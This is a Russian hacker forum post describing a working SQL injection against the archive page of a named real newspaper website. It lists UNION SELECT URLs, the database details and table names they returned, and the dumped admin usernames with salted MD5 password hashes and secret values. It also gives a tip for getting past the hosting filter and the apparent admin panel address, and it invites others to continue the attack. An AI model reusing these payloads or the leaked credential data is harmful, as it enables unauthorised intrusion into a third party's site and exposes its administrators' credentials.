Газета Русский Курьер
Код:
http://ruscourier.ru/archive.php?id=-1+union+select+database()/*
http://ruscourier.ru/archive.php?id=-1+union+select+user()/*
http://ruscourier.ru/archive.php?id=-1+union+select+version()/*
database() = ruscouru
user() = ruscouru@localhost
version() = 5.0.26-lk-log
запросы выборки из таблиц следует отправлять методом POST, так как некоторые ключевые слова фильтруются хостингом
. Удобно использовать плагин для firefox: _https://forum.antichat.ru/thread56473.html
от [53x]Shadow
в базе данных есть следующие таблицы:
Код:
banners
bigpoll_answ
bigpoll_quest
block
categories
comments
hot
issue
menu
news
points
rubr
sympoll_auth
sympoll_data
sympoll_iplog
sympoll_list
templates
в таблице sympoll_auth такие поля:
Код:
uid
user
pass
access
secret
В sympoll_auth 2 записи, выборка содержимого таблицы делается примерно так:
Код:
http://ruscourier.ru/archive.php?id=-1+union+select+user+from+sympoll_auth+where+uid=1+limit+1/*
http://ruscourier.ru/archive.php?id=-1+union+select+pass+from+sympoll_auth+where+uid=1+limit+1/*
http://ruscourier.ru/archive.php?id=-1+union+select+secret+from+sympoll_auth+where+uid=1+limit+1/*
соответсвенно и для uid=2
Содержимое таблицы sympoll_auth:
Код:
user:ruscouru
pass:19635f485c127dc207f32fa1e2157779:ufptnf
secret:db447e070183f8b93ddc30b7a1d2472b:1203592175
access:
user:ruscour
pass:9c47efd296e2d077273e01df82314736:flvbyrf
secret:61e598f9762fd92e568b8334f0498476:1205516158
access:1
(хэши md5)
можно заметить что ufptnf в русской раскладке "газета" а flvbyrf - "админка". Для чего предназначено поле secret пока не очень понятно.
по этому адресу скорее всего расположена админка
_http://ruscourier.ru/admin
с HTTP-авторизацией.
к сожалению никакие пароли и их комбинации с полем secret к ней не подходят.
Может у кого-то получится больше.